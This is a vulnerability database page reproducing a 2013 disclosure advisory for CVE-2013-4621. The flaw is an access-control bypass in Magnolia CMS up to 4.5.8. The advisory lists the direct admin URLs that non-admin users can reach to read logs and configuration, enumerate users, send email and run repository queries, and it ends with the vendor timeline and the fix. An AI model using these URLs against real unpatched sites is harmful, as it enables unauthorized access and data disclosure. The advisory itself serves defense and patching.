Vulners
Lucene search
Magnolia CMS 4.5.8 Access Bypass
šļøĀ 25 Jun 2013Ā 00:00:00Reported byĀ Adrian FurtunaTypeĀ 
Ā packetstormšĀ packetstormsecurity.comšĀ 47Ā Views
| Reporter | Title | Published | Views | Family All 11 |
|---|---|---|---|---|
 | CVE-2013-4621 | 27 Dec 201920:40 | ā | circl |
 | CVE-2013-4621 | 27 Dec 201916:21 | ā | cve |
 | CVE-2013-4621 | 27 Dec 201916:21 | ā | cvelist |
 | EUVD-2013-4477 | 7 Oct 202500:30 | ā | euvd |
 | CVE-2013-4621 | 27 Dec 201917:15 | ā | nvd |
 | Magnolia CMS Access Bypass Vulnerability | 1 Jul 201300:00 | ā | openvas |
| Magnolia CMS Access Bypass Vulnerability | 1 Jul 201300:00 | ā | openvas |
 | Design/Logic Flaw | 27 Dec 201917:15 | ā | prion |
 | CVE-2013-4621 | 22 May 202506:20 | ā | redhatcve |
 | [Full-disclosure] Magnolia CMS multiple access control vulnerabilities | 15 Jul 201300:00 | ā | securityvulns |
10
`Subject:
======
Multiple access control vulnerabilities in Magnolia CMS, Community and
Enterprise editions
CVE ID:
=======
CVE-2013-4621
Summary:
========
A non-admin user (such as default users eric / peter) can access and
execute multiple administrative functionalities of the CMS by accessing
directly the specific URLs.
Product:
========
Magnolia CMS
Vendor:
=======
Magnolia International Ltd.
Affected versions:
==================
Magnolia CMS <= 4.5.8
Tested on: 4.5.8, 4.5.7 and 4.5.3, both Community and Enterprise editions
Not-affected version:
=====================
Magnolia CMS 4.5.9
Product information:
====================
Magnolia CMS is an open-source Web Content Management System that focuses
on providing an intuitive user experience in an enterprise-scale system.
Vulnerability details:
======================
The following functionalities can be accessed and executed by a non-admin
user based on the URL:
- View and set the log level of Magnolia
http://127.0.0.1:8080/magnoliaPublic/.magnolia/log4j
- Read Magnolia log files (can contain sensitive information)
http://127.0.0.1:8080/magnoliaPublic/.magnolia/pages/logViewer.html?command=displayFileContent&fileName=magnolia-error.log
http://127.0.0.1:8080/magnoliaPublic/.magnolia/pages/logViewer.html?command=displayFileContent&fileName=magnolia-debug.log
- View Magnolia configuration:
http://127.0.0.1:8080/magnoliaPublic/.magnolia/pages/configuration.html
- View permissions of Magnolia users. Also can be used for user enumeration
http://127.0.0.1:8080/magnoliaPublic/.magnolia/pages/permission.html
- Send arbitrary email messages
http://127.0.0.1:8080/magnoliaPublic/.magnolia/pages/sendMail.html
- View the list of installed modules
http://127.0.0.1:8080/magnoliaPublic/.magnolia/pages/installedModulesList.html
- Execute arbitrary queries in the repository (limited by the current
user's rights)
http://127.0.0.1:8080/magnoliaPublic/.magnolia/pages/jcrUtils.html
Vendor contact log:
===================
2013-04-25: Contacting vendor through [email protected]
2013-04-29: Vendor acknowledges the receipt of the advisory
2013-04-29: Vendor confirms the vulnerability
2013-06-03: Vendor releases version 4.5.9 which fixes the vulnerability
Credits:
========
This vulnerability was discovered by Adrian Furtuna
http://pentest-tools.com
Solution:
=========
Upgrade to the latest version of Magnolia CMS
`
Data
Build on a solid foundation withĀ Vulners data
WeĀ provide theĀ essential building blocks forĀ cybersecurity solutions withĀ comprehensive, structured, andĀ constantly updated vulnerability andĀ exploits data
Api
Power your application withĀ Vulners API
The Vulners REST API offers reliable, high-performance access toĀ vulnerabilityĀ intelligence, withĀ 99.9%Ā SLAĀ uptime andĀ CDN-backed data delivery forĀ seamlessĀ global access
App
Assess and manage vulnerabilities withĀ VulnersĀ tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
25 Jun 2013 00:00Current
0.8Low risk
Vulners AI Score0.8
EPSS0.00125